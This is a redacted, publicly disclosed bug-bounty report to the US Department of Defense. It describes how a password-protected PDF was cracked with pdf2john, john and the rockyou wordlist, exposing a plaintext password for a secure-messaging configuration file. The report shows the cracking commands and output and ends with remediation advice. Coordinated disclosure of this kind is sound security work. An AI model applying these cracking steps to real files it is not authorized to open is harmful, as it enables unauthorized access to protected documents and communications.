Password Cracking - Weak Password Used to Secure ████ Containing a Plaintext Password

Disclosed: 2021-02-18 19:14:14 By un4gi To deptofdefense
High
Vulnerability Details
**Summary:** I was able to crack the password to the ████████ located at ██████, as the pdf was protected with a weak password contained in a common word list. This guide contains steps to set-up the ███████ secure communication application with the unprotected configuration file located at██████████. This guide also contains a plaintext password for the configuration file. ## Step-by-step Reproduction Instructions 1. Browse to ███ 2. Click `████████`. You will be prompted for a password. 3. Using wget, download the pdf: `wget ████████`. 4. Once downloaded, you can use `pdf2john` to convert the pdf password into a format that is parse-able by `john`: `perl /path/to/john/pdf2john.pl █████████.pdf` 5. This will produce a hash. Cracking this hash with `john` and the `rockyou` wordlist will produce the password: ``` root@kali:/home/kali# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64]) Cost 1 (revision) is 6 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status █████████ (████████.pdf) 1g 0:00:00:00 DONE (2020-09-18 01:08) 1.785g/s 2285p/s 2285c/s 2285C/s 753951..poohbear1 Use the "--show --format=PDF" options to display all of the cracked passwords reliably Session completed ``` 7. You can now browse to █████████, click `███`, and type in the password `█████████` to view the pdf (or view it on your local system). 8. Reading the setup instructions, and attacker can download the `Messaging Config`to download the ████ configuration file. This mobile guide contains the plaintext password for the configuration file (`███████`). They can then attempt to use the configuration file and a compromised `.mil`/`.gov`/etc. account to gain access to ████ secure communications. ## References https://github.com/openwall/john/blob/bleeding-jumbo/run/pdf2john.pl ## Suggested Mitigation/Remediation Actions Use a strong password for this .pdf file in order to prevent successful password cracking attempts. ## Impact This guide contains steps to set-up the ███████ secure communication application with the unprotected configuration file located at█████. This guide also contains a plaintext password for the configuration file. An attacker could potentially join the secure communication channel if they were able to obtain access to the DoD ID number of an ███ member.
Actions
View on HackerOne
Report Stats
  • Report ID: 985133
  • State: Closed
  • Substate: resolved
  • Upvotes: 7
Share this report